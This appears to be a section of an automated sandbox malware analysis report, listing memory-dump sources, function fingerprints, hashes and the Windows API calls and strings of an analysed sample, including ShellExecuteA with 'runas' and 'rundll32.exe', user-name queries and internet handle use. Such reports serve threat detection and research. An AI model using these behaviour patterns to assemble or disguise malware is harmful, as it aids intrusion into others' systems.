                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$AllocateNameProcessUser$Concurrency::cancel_current_task
                                                                                                                                                                                  • String ID: 152138533219$7b6145
                                                                                                                                                                                  • API String ID: 1471344708-2205202256
                                                                                                                                                                                  • Opcode ID: 0980a745c393465c21a925c7558b1d13b948d55dcf925e75d48b00477f28ccbe
                                                                                                                                                                                  • Instruction ID: 2a59b55c48a0c42368ee9bda2a5a6c055afd0c37ced2df3605169e94692fcee2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0980a745c393465c21a925c7558b1d13b948d55dcf925e75d48b00477f28ccbe
                                                                                                                                                                                  • Instruction Fuzzy Hash: D2F22B71A001549BDF1CFB28CC8979EB772AF82308F10869CF40A972D6DB359EC58B59
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000,00CACD15,00000005,?,?,00C873C2,00CACD4C,00000001,00CB1160), ref: 00C82A8D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                                  • String ID: runas$rundll32.exe
                                                                                                                                                                                  • API String ID: 587946157-4081450877
                                                                                                                                                                                  • Opcode ID: 77d9a9f362cc6e3cb74612d641466512ee552d13454d86629fe24643f6b83ef4
                                                                                                                                                                                  • Instruction ID: d63d3965ab9d5332a154bae7892856bef65464577c5dc17f267fb8db9a65d38e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 77d9a9f362cc6e3cb74612d641466512ee552d13454d86629fe24643f6b83ef4
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0A11C71600149AFEF08EF68CC89BEE7B66EF46308F50851CF8159B295D735DA82CB94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00C81CAE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___std_exception_copy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2659868963-0
                                                                                                                                                                                  • Opcode ID: cc21f982f30261496882e4956ea540c76c8a09f7be995dfc80a82c8f3f8501c9
                                                                                                                                                                                  • Instruction ID: d663c7d53f09d0582044741bb2c15d35e91612b7045af8b00c7b283d2de5061f
                                                                                                                                                                                  • Opcode Fuzzy Hash: cc21f982f30261496882e4956ea540c76c8a09f7be995dfc80a82c8f3f8501c9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9551CFB1900609CFEF15DF58E9897AEB7F4FB44350F34866AD916EB6A0E3709A40CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ($]c@m
                                                                                                                                                                                  • API String ID: 0-3740295130
                                                                                                                                                                                  • Opcode ID: 68b867f8d0cf6ec18b5cf1d77f5b780c5e6585629d1f6a7e3b0b1cfe90dbd167
                                                                                                                                                                                  • Instruction ID: 3677ad4306139beb1343fc428dc87244bbb35fe1f5f75f7c19fd41fad07350c9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 68b867f8d0cf6ec18b5cf1d77f5b780c5e6585629d1f6a7e3b0b1cfe90dbd167
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98522971A001089BEF18EF68CC85B9DB776EF86308F10829CF415A72D6D7759E85CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(?,?,?,00000001,?,00CAD3A0,00000001), ref: 00C89AC9
                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(?,?,?,00000001,?,00CAD3A0,00000001), ref: 00C8A17B
                                                                                                                                                                                    • Part of subcall function 00C8F3C0: Concurrency::cancel_current_task.LIBCPMT ref: 00C8F501
                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C8AE02
                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C8AE2A
                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 00C8AE6F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFileXinvalid_argumentstd::_$Concurrency::cancel_current_taskSleep
                                                                                                                                                                                  • String ID: 152138533219$:::$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                  • API String ID: 2595341054-2973408965
                                                                                                                                                                                  • Opcode ID: 72796db787d70d2991bea341260377ae37f29c656a05fede31929dda17f998ed
                                                                                                                                                                                  • Instruction ID: 234056450f96966c2e57a8bc1cc4da1dd21bd41b35a6c35fb6feba8b2fcb4196
                                                                                                                                                                                  • Opcode Fuzzy Hash: 72796db787d70d2991bea341260377ae37f29c656a05fede31929dda17f998ed
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E22871A001049BEF1CFF78CC857ADBB72AF86308F10865CE415AB3D6D7359A858B99
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00C8250B
                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00C8250E
                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00C8251F
                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00C82522
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseHandleInternet
                                                                                                                                                                                  • String ID: <$Microsoft Internet Explorer$runas
                                                                                                                                                                                  • API String ID: 1081599783-436926838
                                                                                                                                                                                  • Opcode ID: 8848383f06b73383f89544b90870c3e697b1694c7a5d5e2f9c251d29125b6b8e
                                                                                                                                                                                  • Instruction ID: 69072c76f85f5dbdede00d9b17960a435bc734c16e4ebe0d49c04736cf2f63b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8848383f06b73383f89544b90870c3e697b1694c7a5d5e2f9c251d29125b6b8e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 38411931E00119ABDB18EFA4CC45BAEBBB9EF85304F108169F515A7291D734EA41CB98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                  • String ID: jjh$jjj$jjjj
                                                                                                                                                                                  • API String ID: 2638373210-3331015499
                                                                                                                                                                                  • Opcode ID: aa7ff346637b7796467f8eacf3b3483d8c1b1d04c2fe9507a3818dd461193503
                                                                                                                                                                                  • Instruction ID: 6a76faff1d1acc409e68a596a4cb528437185aeb74226d3228b224b433a4a86d
                                                                                                                                                                                  • Opcode Fuzzy Hash: aa7ff346637b7796467f8eacf3b3483d8c1b1d04c2fe9507a3818dd461193503
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A5179716101046BDF08FBB8CC8AFAE3A69AF46308F444528F915972D2D779DB81C7A9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 00C81DCA
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00C81DDF
                                                                                                                                                                                    • Part of subcall function 00C81DA0: RtlAllocateHeap.NTDLL(00000000), ref: 00C81DE2
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 00C81DF0
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00C81E1E
                                                                                                                                                                                    • Part of subcall function 00C81DA0: RtlAllocateHeap.NTDLL(00000000), ref: 00C81E21
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00C81E31
                                                                                                                                                                                    • Part of subcall function 00C81DA0: RtlAllocateHeap.NTDLL(00000000), ref: 00C81E34
                                                                                                                                                                                  • GetUserNameW.ADVAPI32(?,00000100), ref: 00C8CB92
                                                                                                                                                                                    • Part of subcall function 00C8EBB0: Concurrency::cancel_current_task.LIBCPMT ref: 00C8EC64
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
